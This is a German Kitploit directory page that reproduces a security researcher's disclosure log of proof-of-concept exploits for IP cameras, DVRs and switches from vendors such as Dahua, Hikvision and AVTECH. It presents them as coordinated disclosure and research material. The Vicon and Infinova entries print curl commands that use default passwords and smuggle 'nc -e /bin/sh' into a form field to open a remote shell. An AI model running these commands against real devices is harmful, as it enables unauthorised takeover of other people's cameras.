Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC — Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported. | Kitploit
Tools/GitHubGitHub/mcw0/poc
Embedded Systems SecurityReconnaissanceIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingBinary Exploitation
GitHubmcw0/poc

PoC

Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.

Repository anzeigen
783307vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC

Verschiedene PoCs - Internet der (Un)Sicherheits-Dinge

Es lohnt sich, über diese miesen (un)sicheren Dinge zu lesen: https://ipvm.com/reports/security-exploits

Hikvision CVE-2021-36260


2021-10-19

Alle Credits an Watchful_IP (https://watchfulip.github.io/)

https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py

Dahua CVE-2021-33044, CVE-2021-33045


2021-10-06

Details: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

PoC: https://github.com/mcw0/DahuaConsole

2021-09-06

Zwei unabhängige Umgehungen der Authentifizierung.

Aufgrund des sehr hohen Potenzials eines weiteren "Dahua-Massen-Hacks" werde ich die Full-Disclosure-Details bis zum 6. Oktober 2021 zurückhalten.

Es wird dringend empfohlen, die Firmware bis dahin zu aktualisieren.

https://www.dahuasecurity.com/support/cybersecurity/details/957

Dahua DES/3DES Ver-/Entschlüsselung, NetSDK-Zugangsdaten-Leaks, Cloud-Schlüssel/Passwörter, DHP2P PoC


2020-05-09

  • Dahua DES/3DES (kaputte) Authentifizierungsimplementierung und PSK
  • Schwachstelle: Dahua NetSDK gibt Zugangsdaten (erste 8 Zeichen) aller Clients in der REALM-Anfrage preis, wenn DVRIP- und DHP2P-Protokoll verwendet werden
  • PoC: Einfacher TCP/37777-DVRIP-Listener hinzugefügt, um entschlüsselte Zugangsdaten im Klartext anzuzeigen
  • Schwachstelle: Leak von Zugangsdaten im Dahua-DHP2P-Cloud-Protokoll
  • Schwachstelle: Hartkodierte DHP2P-Cloud-Schlüssel/Passwörter für 23 verschiedene Anbieter
  • PoC: Zugriff auf Geräte innerhalb der DHP2P-Cloud. PoC nur für Dahua IMOU erstellt

https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py

Update: Dahua-JSON-Debug-Console-v2.py


2020-02-29

  • Option 'setDebug' hinzugefügt. Sollte beginnen, Ausgaben von der Debug-Konsole in VTO/VTH zu erzeugen
  • '--discover' hinzugefügt: Multicast-Suche nach Geräten oder direkte Abfrage (--rhost 192.168.57.20) eines Geräts via UDP/37810
  • '--dump {config,service}' hinzugefügt, um Konfiguration oder Dienste auf einem entfernten Host zu sichern, ohne die Debug-Konsole zu betreten

https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py

Update


2020-02-15

Im Laufe dieser Woche wurde Kontakt mit dem Dahua PSIRT aufgenommen. Details, PoC und Nachweise für 23 verschiedene Cloud-Anbieter wurden bereitgestellt. Ich werde mich außerdem an das neue Vorgehen von Google Zero 'Policy and Disclosure: 2020 Edition' halten (da es für mich Sinn ergibt), das heißt, ich werde nach 90 Tagen veröffentlichen, unabhängig davon, ob Dahua Updates vor oder nach dem 09.05.2020 19:00 UTC (9. Mai 2020, 19:00 UTC) veröffentlicht.

Dahua, bitte behebt das und stellt Updates vor diesem Datum bereit ...

Referenz: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html

Vor wenigen Stunden


2020-02-10

Ich habe gerade Zugangsdaten-Leaks (die im Klartext enden) aus dem Dahua SDK an das Dahua PSIRT gemeldet. Mal sehen, wie sie diese Informationen aufnehmen. Ziemlich übel, wenn mehr als 20 verschiedene Cloud-Anbieter betroffen sind ... 90 Tage laufen ab heute.

Tools


2020-01-20

Neues Repository erstellt, in das ich einige Tools einstellen möchte.

https://github.com/mcw0/Tools

Als Erstes: Dahua-JSON-Debug-Console-v2.py

  • Auf Python 3 portiert
  • Einige Fehler behoben und Code angepasst
  • Unterstützung für DVRIP (TCP/37777) hinzugefügt [Hinweis: Einige JSON-Befehle, die mit DHIP funktionieren, liefern mit DVRIP nichts zurück]
  • encode/decode in Latin-1, wir könnten unveränderte Zeichen zwischen 0x00 und 0xff benötigen
  • Besseres 'debug' mit Hexdump als Option

Axis Communications


2019-10-06 (alte Sachen)

Anonym Modell und Firmware-Version von Axis-Geräten erkennen (1998 - 2019).

https://github.com/mcw0/PoC/blob/master/axis-detect.py

Realtek Managed Switch Controller (RTL83xx) PoC


2019-08-20

https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py

Mehrere Schwachstellen in mehreren Netzwerk-Switches


2019-08-06

https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches

Alle technischen Details zusammen mit dem Python-PoC werden hier am 20. August 2019 veröffentlicht.

LifeSafety Power


2019-05-15

Mehrere Stack-Overflows, RCE, Offenlegung von Benutzername/Passwort im Klartext und mehr

https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py

Dahua DHIP JSON-Debug-Konsole (authentifiziert)


2019-04-10

Dieses Skript verwendet das binäre P2P-Protokoll "DHIP" von Dahua, das auf normalen HTTP/HTTPS-Ports und TCP/5000 funktioniert

Es verbindet sich mit der internen "Debug-Konsole" von Dahua-Geräten über JSON (gleiche Art wie das frühere Debug auf TCP/6789)

https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py

Viel Spaß, bashis

VDOO


2019-01-23

Grüße, lange nichts veröffentlicht ...

Ich bin immer noch da und betreibe meine Forschung, aber die Neuigkeit ist, dass ich versuche, mit VDOO (https://www.vdoo.com/) für das Vendor-Management zusammenzuarbeiten, und das hat meinen Full-Disclosure-Prozess leider etwas verzögert ...

Wie auch immer, es stehen einige interessante Untersuchungen als Full Disclosure hier auf meinem GitHub an.

Durch die Zusammenarbeit mit VDOO kann ich das tun, was ich gerne mache, und muss keine Zeit mit den Herstellern verschwenden, die (nicht wollen | nicht verstehen | ignorieren wollen | verzögern wollen | was auch immer).

Das Neueste sind einige Reolink-Sachen (https://reolink.com/), die Sie hier finden: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.

AVTECH Corporation


2018-06-18

AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE

https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt

https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py

Reolink Digital Technology Co., Ltd.


2018-06-03

Reolink {IPC} RCE (Authenticated)

https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py

Shenzhen TVT Digital Technology Co. Ltd


2018-04-09

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

AVTECH


2018-03-05

AVTECH {DVR/NVR/IPC} Authenticated RCE

https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py

Geovision Inc.


2018-02-01

Geovision Inc. IP-Kamera/Video/Zutrittskontrolle - Mehrfache Remote-Befehlsausführung - Mehrfacher Stack-Overflow - Double-free - Unbefugter Zugriff https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt

Geovision Inc. IP-Kamera & Video-Server Remote-Befehlsausführung PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py

Herospeed


2018-01-22

Der Herospeed-TelnetSwitch-Daemon läuft auf TCP/787 und ermöglicht das Aktivieren des telnetd. Ein kleiner Stack-Overflow erlaubt es uns, das dynamisch generierte Passwort zu überschreiben und telnetd zu aktivieren. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py

Foscam


2018-01-15

Kleiner OpenSSL-Wrapper, um verschiedene Verschlüsselungsschlüssel/Digests und Chiffren an Foscam-IPC-Firmware-Images zu testen. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py

Deobfuskiere Strings/Login/Passwort/Crypto-Key in verschiedenen Foscam-IPC-Binaries und Bibliotheken https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py

Vitek RCE und Informationsoffenlegung (und möglicherweise andere OEM) 0-day


2017-12-22

https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt

Remote-Stack-Format-String in der 'nsd'-Binärdatei mehrerer OEM (0-day)


2017-12-14

https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt

Bild hier: http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/

Nicht abstürzende Format-String-Backdoor Proof-of-Concept


2017-12-05

https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c

Vicon Security RCE (authentifiziert)


2017-12-03

// Enable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Infinova RCE (authentifiziert)


2017-12-03

// Enable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Hinweis: Ich bin mir ziemlich sicher, dass es weitere OEMs gibt, die dasselbe verwenden.

Axis Communications


2017-12-01 Axis Communications MPQT/PACS Heap-Overflow und Informationsleck https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt

Stunnel


2017-11-13 Reverse-Stunnel-TLSv1-Privacy-Shell https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt

Vivotek


2017-11-13 Vivotek IP-Kameras - Remote-Stack-Overflow https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt

Uniview


2017-10-29 Uniview RCE und Export-Konfigurations-PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt

Axis


2017-10-19 Ein altes, vergessenes Fuzzing aus Q3/2016, das zu RCE führte (PoC: Remote-Connect-Back-Shell) und zum remote Auslesen von /etc/shadow. Wurde an Axis gemeldet und in Q3/2016 behoben. Ich poste es trotzdem hier, da es ein guter Hinweis sein könnte. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE

DAHUA


2017-10-17 Telnetd in Dahua aktivieren / deaktivieren (für neuere Firmware-Versionen) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py

2017-05-03

Öffentliche Wiederveröffentlichung des Dahua-Backdoor-PoCs https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

Mit meinem neu gewonnenen Wissen über anfällige Geräte da draußen – eine unglaubliche Zahl von mehr als 1 Million Dahua-/OEM-Einheiten – wobei das Wissen aus einem Bericht von NSFOCUS und meiner eigenen Recherche auf shodan.io stammt.

Mit diesem Wissen werde ich den Python-PoC nicht wie zuvor für den 5. April angekündigt öffentlich veröffentlichen, da dies nicht notwendig ist, wenn der PoC bereits von IPVM und anderen unabhängigen Sicherheitsforschern verifiziert wurde.

Ich bin jedoch offen dafür, den PoC mit ernsthaften Sicherheitsforschern zu teilen, falls gewünscht. Bitte senden Sie mir eine E-Mail außerhalb der Liste und seien Sie deutlich, wer Sie sind, damit ich Sie nicht für einen Bittsteller halte, den ich ignoriere.

NSFOCUS-Bericht: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


Haben Sie die Datums- und Zeitstempel auf Dahuas Patches bemerkt? Schauen Sie sich die Screenshots an von http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png

https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png

Nicht nur NVR/DVR/IPC/HDCVI stehen auf der Liste

Auch Gegensprechanlagen, VTO2000A wurde bestätigt http://www1.dahuasecurity.com/au/products/vto2000a-762.html

Tool herunterladen